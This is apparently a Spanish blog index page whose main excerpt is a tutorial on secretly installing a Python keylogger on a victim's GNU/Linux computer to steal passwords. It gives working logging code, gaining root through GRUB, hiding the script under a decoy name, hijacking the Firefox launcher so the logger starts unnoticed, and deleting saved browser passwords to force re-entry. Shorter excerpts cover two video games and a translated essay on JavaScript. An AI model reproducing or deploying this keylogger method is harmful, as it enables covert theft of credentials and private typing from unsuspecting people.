Registrador de teclas (keylogger) en Python para GNU/Linux. Enviar información por correo y autodestruirse

En este artículo enseño como programar un keylogger avanzado que envía mensajes por correo electrónico y se autodestruye después de una fecha concreta.

Continúa leyendo Registrador de teclas (keylogger) en Python para GNU/Linux. Enviar información por correo y autodestruirse

Registrador de teclas (keylogger) básico para GNU/Linux. Robar contraseñas e información tecleada

Una forma sencilla de robar contraseñas es instalar un registrador de teclas (keylogger) en el ordenador de la víctima. Voy a mostrar cómo hacerlo en GNU/Linux usando el lenguaje de programación Python.

Lo primero que debemos hacer es obtener permisos de superusuario. Si el equipo lo administramos nosotros, ya sabemos la contraseña. En caso contrario, podemos obtener acceso como superusuario desde GRUB. Con los permisos necesarios tenemos vía libre para instalar el keylogger.

En primer lugar, hay que instalar el módulo pynput mediante...

sudo pip install pynput

A continuación, debemos escribir el keylogger. Este es el código que usaremos:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

El registro de teclas se guarda en log_dir. Yo, en este caso, he especificado la carpeta de documentación de Python 3 en GNU/Linux. El keylogger también podemos guardarlo en ese mismo directorio, quizá con el nombre compile_docs.py o algo parecido para no llamar la atención. Lo ideal es elegir una carpeta a la que la victima no vaya a entrar para evitar que se dé cuenta de lo que estamos haciendo.

El último paso sería ejecutar el programa cada vez que se encienda el ordenador o se inicie un programa sin que la víctima se dé cuenta. Si, por ejemplo, queremos iniciar el keylogger cada vez que el usuario abra Firefox, podemos modificar el comando Firefox. Podemos renombrar firefox1 a firefox.bin y crear el siguiente archivo llamado firefox.

python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "@$"

Para saber qué archivo firefox se ejecuta cuando pulsamos su icono debemos ir a /usr/share/applications, entrar al archivo firefox.desktop (o firefox-esr.desktop) y buscar la línea que empieza por Exec.

A continuación, habría que darle permisos de escritura para otros usuarios distintos de root al directorio donde vamos a almacenar el registro de tecleo:

sudo chmod o+w /usr/share/doc/python3

Finalmente, deberíamos esperar a que la víctima usara el ordenador para obtener sus contraseñas o cualquier información que teclee que queramos obtener. El registro de teclas se guardará en el archivo /usr/share/doc/python3/log. Pero ten cuidado: el archivo puede ocupar mucho espacio si no lo borras periódicamente, por lo que lo mejor sería desinstalar el keylogger después de obtener la información que necesitemos. Otra opción es configurarlo para que mande la información de tecleo por correo electrónico en vez de guardarla en un archivo, con lo que no ocuparía mucho espacio el ordenador de la víctima; pero ese método requiere que usemos un correo electrónico2.

Si la víctima tiene las contraseñas guardadas en el navegador y no necesita escribirlas de nuevo, podemos borrarle el archivo de contraseñas para que se vea obligada a introducirlas de nuevo. En definitiva, con ingenio podemos conseguir mucha información, especialmente si aplicamos este método contra usuarios poco avanzados, que no sospecharán mucho. Para usuarios más avanzados quizá lo mejor sería compilar el programa compile_docs.py con Nuitka, como muestro en el siguiente artículo.


  1. En Debian tendríamos que modificar el archivo firefox-esr

  2. La ventaja de enviar las contraseñas por correo electrónico es que no necesitamos volver al ordenador de la víctima para abrir el archivo de registro de tecleo, sino que recibiremos la información periódicamente por correo. 

Videojuego de carreras: SuperTuxKart

SuperTuxKart es un videojuego de carreras de gran calidad. Los personajes son las mascotas de programas libres, como Tux, Gnu y Wilber (la mascota de GIMP). Tiene un modo historia, varios niveles de dificultad y permite jugar en línea.

Selección de personaje
Animación del modo historia

Pero además de las clásicas carreras de coches con objetos, existen modos de juego diferentes: fútbol, sigue al líder, contrarreloj y batalla. De estos el más interesante para jugar en línea es fútbol, ya que permite competir por equipos. Suele haber algún torneo de fútbol en línea cada mes.

Partido de fútbol

El juego se puede instalar en distribuciones de GNU/Linux derivadas de Debian ejecutando sudo apt install supertuxkart.

Abajo dejo el tráiler de la versión más reciente, la 1.3:

Continúa leyendo Videojuego de carreras: SuperTuxKart

Videojuego Super Bombinhas

Una bombas vivientes son las protagonistas de este videojuego de plataformas. Bomba Azul es la única bomba que no fue capturada por el malvado Gaxlon. Debes salvar a las otras bombas y al rey Aldan. Cada bomba tiene una habilidad especial: Bomba Amarela puede correr rápidamente y saltar más que las otras, Bomba Verde puede explotar, el rey Aldan puede detener el tiempo, etc. Después de salvar a una bomba puedes cambiar a ella durante la aventura.

En el juego hay 7 regiones muy diferentes. Cada una de ellas tiene un enemigo final. Debes usar de forma inteligente todas las bombas para avanzar.

El juego también tiene un editor de niveles para crear nuevos niveles.

Editor de niveles

Como una imagen vale más que mil palabras, os muestro a continuación un vídeo corto:

Continúa leyendo Videojuego Super Bombinhas

¿Arreglar o matar el JavaScript instalado automáticamente?

Este artículo es una traducción del inglés del artículo «Fix or Kill Automatically Installed JavaScript?» publicado por Julie Marchant bajo la licencia CC BY-SA 4.0.

En el ensayo de Richard Stallman, «La Trampa de JavaScript», se señala que la gente ejecuta software privativo que es silenciosamente, automáticamente instalado en sus navegadores cada día. De hecho, él restó importancia en gran medida al problema; no solo la mayoría de usuarias está ejecutando programas privativos cada día meramente navegando la Red, están ejecutando docenas o incluso cientos de tales programas cada día. La Trampa de JavaScript es muy real y prolífica; se dice que la Red está tan rota sin estas extensiones de HTML no estándares, normalmente privativas, que los navegadores han pasado a ni siquiera ofrecer una opción obvia para deshabilitar JavaScript; deshabilitar JavaScript, se argumenta, solo causará confusión.

Es obvio que necesitamos resolver este problema. Sin embargo, al centrarse en si los guiones son «triviales» o libres, el señor Stallman olvida un punto importante: este comportamiento de instalación de software automático, silencioso es, en sí, el principal problema. Que la mayoría del software en cuestión sea privativo es meramente un efecto secundario.

Continúa leyendo ¿Arreglar o matar el JavaScript instalado automáticamente?